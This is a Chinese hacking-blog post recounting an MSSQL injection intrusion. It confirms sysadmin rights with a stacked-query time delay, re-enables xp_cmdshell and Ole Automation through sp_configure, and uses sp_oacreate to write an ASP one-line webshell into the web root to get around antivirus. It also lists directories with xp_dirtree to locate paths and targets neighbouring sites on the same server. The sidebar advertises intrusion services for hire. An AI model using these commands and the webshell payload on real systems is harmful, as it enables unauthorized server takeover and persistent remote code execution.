欢迎来到【血梦博客】 今天是:2022年05月18日 星期三
站长联系QQ:9468395
0x01 存在注入
https://www.cnblogs.com/zpchcbd/p/12167244.html
通过堆查询延迟注入,判断是dbo的权限
;if(selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFOR DELAY'0:0:05'--
那么直接通过sqlmap来进行执行命令 --os-shell,发现
[18:39:23] [INFO] checking if xp_cmdshell extended procedure is available, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y [18:39:25] [WARNING] xp_cmdshell re-enabling failed
通过--sql-shell 来手动开启
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; os-shell> exec master..xp_cmdshell "whoami"
当sqlmap启动xp_cmdshell组件执行失败的时候还会尝试去开启sp_OACreate,手动执行语句为:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
但是还是发现执行失败:Command standard output [0]
0x02 提权
在之前信息搜集的时候发现开放的端口有

连接下3389发现确实是有杀毒存在

所知道的利用xp_cmdshell、spsp_OACreate COM组件之类的进行执行命令都会被杀毒拦截,只能从别的方面下手
既然是dbo的权限那么也可以尝试通过差异备份等等的方法来绕过杀毒,这里利用的是存储过程来写文件
declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:inetpubmuma.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>'
因为这里自己已经读到了权限dbo的密码,所以是直接用navicat上直接操作
execute master..xp_dirtree 'c:' //列出所有c:文件和目录,子目录 execute master..xp_dirtree 'c:',1 //只列c:文件夹 execute master..xp_dirtree 'c:',1,1 //列c:文件夹加文件
通过以上的操作来寻找目录的地址,然后通过以上的操作来写文件就可以了

后来通过同服旁站的查询发现另外一个站点上的目录上文件有报错,同样可以发现路径来尝试写到另一个站点上,高权限

- 上一篇:记录又一次实战GetShell
- 下一篇:Mssql注入绕过360执行命令
猜你还喜欢
- 07-08九年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 03-21黑客如何破解wifi密码
- 01-12批量检测SQL注入
- 最新文章
- 随机文章
-
- Apache Struts2 S2-057漏洞分析预警
- 搭建dvwa环境学习从MySql注入到GetShell
- 代码审计入门级DedecmsV5.7 SP2分析复现
- 黑产,彼之蜜糖,滴滴之砒霜
- 快讯 | 华住旗下酒店上亿条用户数据在暗网售卖,包含重要身份信息及开房记录
- linux操作系统的快捷键及命令讲解
- 技术分享 | 一种针对PHP对象注入漏洞的新型利用方法
- 自己动手打造工具系列之自动刷新简历
- 漏洞预警 | ECShop全系列版本远程代码执行高危漏洞
- 技术讨论 | 简谈渗透测试各阶段我常用的那些“神器”
- PHP WebShell代码后门的一次检查
- 利用Microsoft Edge漏洞窃取本地文件
- 挖洞经验 | 看我如何发现Facebook的$5000美金漏洞
- 利用Office文档结合社会工程学手段欺骗用户执行恶意代码
- 通过SSTI漏洞获取服务器远程Shell
- Windows平台下实现提权的新姿势
- 给你一次重来的机会,你会选择安全行业吗?
- 如何防御Node.js中不安全的重定向
- 一处代码执行引发的思考
- 代码自动化扫描系统的建设(上)
- 热门文章
-
- 九年专业安全团队承接渗透入侵维护服务
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- Emlog黑客站模板“Milw0rm”发布
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑客怎样简单入侵别人手机,黑客是如何入侵手机的?
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 文章标签
-